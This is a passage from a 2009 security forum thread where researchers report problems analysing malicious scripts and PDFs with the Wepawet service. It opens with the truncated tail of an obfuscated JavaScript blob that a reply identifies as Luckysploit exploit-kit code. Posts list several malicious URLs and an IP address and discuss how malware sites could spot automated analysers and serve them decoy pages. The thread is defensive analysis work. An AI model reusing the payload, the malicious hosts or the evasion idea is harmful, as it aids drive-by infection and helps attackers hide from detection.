NQ+LDY+CRW+RID+POH+CRR+QCF+XSZ+FPZ+RXZ+PWP+ESV+HCU+SMO+NTO+LNM+DLG+IFN+CDD+UXY+ZSJ+FXB+QOD+COR+YWX+CKD+MGI+DGI+YQT+OTU+HXF+MWM+SJQ+TTW+ZEN+KUE+LXL+QGD+EHG+DSY+BPP+JMZ+QNL+HOI+MTQ+ZSZ+ZGR+XQY+GNT+ZTX+GIP+WWF+QVK+OKR+QJQ+YOM+CGS+YQQ+XFQ+CUC+PLG+UXR+GHY+VLI+QBY+QOR+SIH+DIL+TQV+OMY+TWW+IFL+FJL+XDJ+LQK+YUF+LBG+MFR+BOT+SEG+NQS+TBB+RKQ+EVH+VMN+QEM+SGZ+JGH+WZH+BHT+QJH+BZV+QYU+RZH+JMI+JHM+ISQ+JZG+FSL+SGM+FHP+PJF+RLH+TZF+IEX+IPV+ICY+HGE+MZY+JDV+OCN+BSY+VVT+LPQ+QPI+VMY+MXI+ZET+GHU+YSP+OIY+WOS+EZK+MJG+GOS+RLS+SMD+FRL+ZKS+YKK+KTB+DGT+ULN+WGI+RLG+DRO+BGY+PJB+DBV+HON+YBM+GUJ+FOS+FHK+MJE+RFC+FWX+KLN+LYE+TNO+BGG+NQM+YPB+YXH+HSX+DVT+OGH+HNS+ZIY+HOY+IBG+XNR+GOU+KNC+TJK+WDM+LLU+YTO+UUM+IDW+QRV+FXY+HJW+LJZ+TUN+OCX+VKZ+NWQ+NME+KCP+KLT+UTQ+ODG+FDK+NKE+GUD+GGL+HZG+KZL+SCS+FXI+BRJ+BMM+GPB+ULC+KHS+GEY+GQF+NMS+ECB+NML+BLG+WHX+OQZ+UYS+PXK+JDP+EQR+CCK+NPY+WVP+MPF+NWG+UPE+RTP+JGL+IVO+LMF+IUR+JVZ+SGX+UBP+UEH+KSO+YOS+VMW+USP+KUN+POL+JPI+ZBZ+OBE+OVR+IOY+QIG+XUX+DNG+MGN+TOH+CCX+KLK+QYE+GJS+DQC+DHS+NGQ+TWM+YJH+TRT+PWQ+GJY+YZN+GGP+LGZ+CMY+UFJ+VDY+ZPG+XEN+DZX+FNC+SCT+NRU+WEV+GUE+JJJ+NVE+VCY+OBO+CIB+ZVW+YSO+MRJ+BSC+NFD+HBI+CWC+ECS+XPY+HNB+EJN+BPR+BUE+VZW+EXR+VGF+MRR+VZS+ZHR+BLK+FNV+NRY+OQX+VCB+TRM+RFP+LHF+ROL+CHV+XUF+KDV+FVO+NZN+FDU+JYZ+MLW+RRC+MHB+JVD+RQM+QYI+CCJ+BJL+UHB+YDB+JBI+VKG+ZRQ+QXJ+ZSD+BON+VNH+QHF+HMR+WXP+PFL+DTX+MBC+PPI+DOF+UJR+VJE+HSN+XXC+RYD+ZFQ+TXY+LDO+MGH+PLZ+EMR+KSC+REF+IUF+RDX+GLJ+RQY+BXB+KRG+JHV+LZR+UVT+YQO+CXV+NTY+RYS+QXV+FQZ+QQH+MBV+RKO+HJM+DKH+JYU+WQY+GXP+OWG+XCK+MYI+HUM+ETD+SWL+MJP+HFO+CUV+WFO+DWB+QNS+HUH+RRO+BEV+JKD+EXK+DYI+UJP+WIF+DLC+DPX+TSL+DNM+LWH+UPU+XKZ+REW+OXN+NLT+DEI+RUM+QSQ+HKY+LBU+PSS+FDX+GCS+SMW+DPL+WUL+OJZ+KTE+LWE+YCB+DTP+GMP+CBU+VGY+YRM+DIB+LFN+ZTM+CNP+KKB+TPH+NYO+CVK+CMO+QCN+VYE+MTR+ESF+HMY+KME+ING+YUW+RII+UBE+FWV+DHZ+RLZ+SNI+MDY+XIE+QLC+MGZ+CUR+CRB+DBU+ODX+FVZ+EER+OSD+XCR+WJD+ZEQ+ELW+OUR+PJE+BDN+GLI+BKN+HFZ+WSQ+NKH+VPG+YJB+LOI+YQZ+ZNM+RLI+EYZ+IHR+VWN+GOT+CBH+QHB+TMW+WFX+DXQ+EHN+EZT+NMZ+MHP+NPS+XTN+WKO+OVT+YSH+GSH+FNK+BZZ+BPV+JJV+TKL+GEU+WBM+TTX+HHG+HGM+UIF+RBJ+LTR+XMU+MHV+ZSE+GPY+NYT+IFP+UML+FXV+DVS+CSP+YFN+OUF+SXW+DLZ+XKM+IID+DVR+NHS+LFX+YCZ+ZVQ+HQY+ZLG+SIS+DJZ+QSC+WZZ+BTD+ZSB+SLI+EQS+SCY+RQL+NKQ+MPV+IXP+PPL+BTH+JZD+BCK+SVJ+GZP+OKE+HSE+IPE+ILM+LPR+RCD+WMO+MDT+UPB+WPU+WGQ+RFF+WGF+DQT+DWX+JUY+JZT+POK+UZY+FDN+IRG+KVN+FIL+QLB+ZPF+JFJ+JMH+UYP+HOU+JID+POV+YVC+LHJ+LSO+FUF+TTE+IXQ+FTF+HZZ+UBF+HNZ+GNN+IRJ+LNB+KQJ+JNK+MJW+KBM+OMJ+YVF+MOI+BIO+YXZ+KJX+SUD+UPS+BBD+VIG+VNE+URG+OGB;OJOVLR(VYGLDW);</script></html>
Wepawet is returning "Invalid hostname." and Malzilla can't seem to decode it ........ :(
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 07, 2009, 01:04:43 am
Reply #62

mercutio

  • Special Members
  • Full Member

  • Offline
  • *

  • 52
MysteryFCM,

The script you posted is decoded here:
http://wepawet.cs.ucsb.edu/view.php?hash=15db7e6dd281669c3f571942c75b3fcb&type=js
Luckysploit...

Regarding flash, I'll inquire with the "flash guy". I know that some work is under way, but I guess it will take time.


May 07, 2009, 01:26:39 am
Reply #63

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 09, 2009, 02:29:18 pm
Reply #64

extrexploit

  • Newbie

  • Offline
  • *

  • 8
Hi guys,
Wepawet has a disclosure problem IMHO.
When an exploiter try to identify the configuration host probing activex version, browser version, plug in version and so on wepawet set this value in the same mode. This can useful for a botadmin because the response sent to exploiter support web site, it may be used for understand how react to attempts for automatic analysis. For example, if a common php stage of a malware spreading site recognize that the variables used by exploiter are valued with a schematic mode it can provide a fake page and made wrong result in terms of analysis . This only my point of view.
Feedback are welcome.
I have posted something about on my blog http://extraexploit.blogspot.com

Regards


May 10, 2009, 06:12:46 pm
Reply #65

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

May 10, 2009, 08:16:48 pm
Reply #66

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 11, 2009, 03:31:32 am
Reply #67

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Mal-Aware

May 12, 2009, 02:02:56 am
Reply #68

mercutio

  • Special Members
  • Full Member

  • Offline
  • *

  • 52
SysAdMini: from here 91.207.61.32/.r/.fi/index.php returns 404 and a benign error message.
The site is of course rather bad: http://wepawet.cs.ucsb.edu/domain.php?hash=6dbd5991176c36df9c0c505c04beba7e&type=js

MysteryFCM: I think the redirection will not be triggered unless the referer is "correct". Unfortunately, wepawet visits the page with an empty referer.

CkreM: yes, I really need to fix that. For now, I've just regenerated the report manually. Real fix coming in the next days, hopefully.

May 12, 2009, 01:32:40 pm
Reply #69

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Depending on the method you're using, you should be able to set the referer? (or have an option to use one?)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 12, 2009, 03:32:18 pm
Reply #70

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Wepawet is unable to analyze the pdf file at

Code: [Select]
hugetopnano.cn:8080/cache/readme.pdf
Not only the url fails. If I upload the pdf file then it fails too.
Ruining the bad guy's day

May 12, 2009, 06:29:03 pm
Reply #71

B_H

  • Special Members
  • Full Member

  • Offline
  • *

  • 49
why wepawet can not analyze url with user pass ? for illegal policy ?! i have seen some url include user pass and hosted malware .

May 12, 2009, 07:36:08 pm
Reply #72

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 12, 2009, 08:58:57 pm
Reply #73

mercutio

  • Special Members
  • Full Member

  • Offline
  • *

  • 52
SysAdMini: yeah, bug. Fixed:
http://wepawet.cs.ucsb.edu/view.php?hash=07ae80f2efd19ef8c6b5b0570cf4ab06&t=1242162153&type=js

B_H: yes, no https, no user/pass. If that becomes too much of a problem, it can be changed.

May 15, 2009, 11:06:03 am
Reply #74

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Says invalid hostname;

time-for-mumpreneurs.site90.net\images\index.php

It's IP is actually: 64.235.47.65 (srv19.000webhost.com)

http://hosts-file.net/?s=time-for-mumpreneurs.site90.net
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net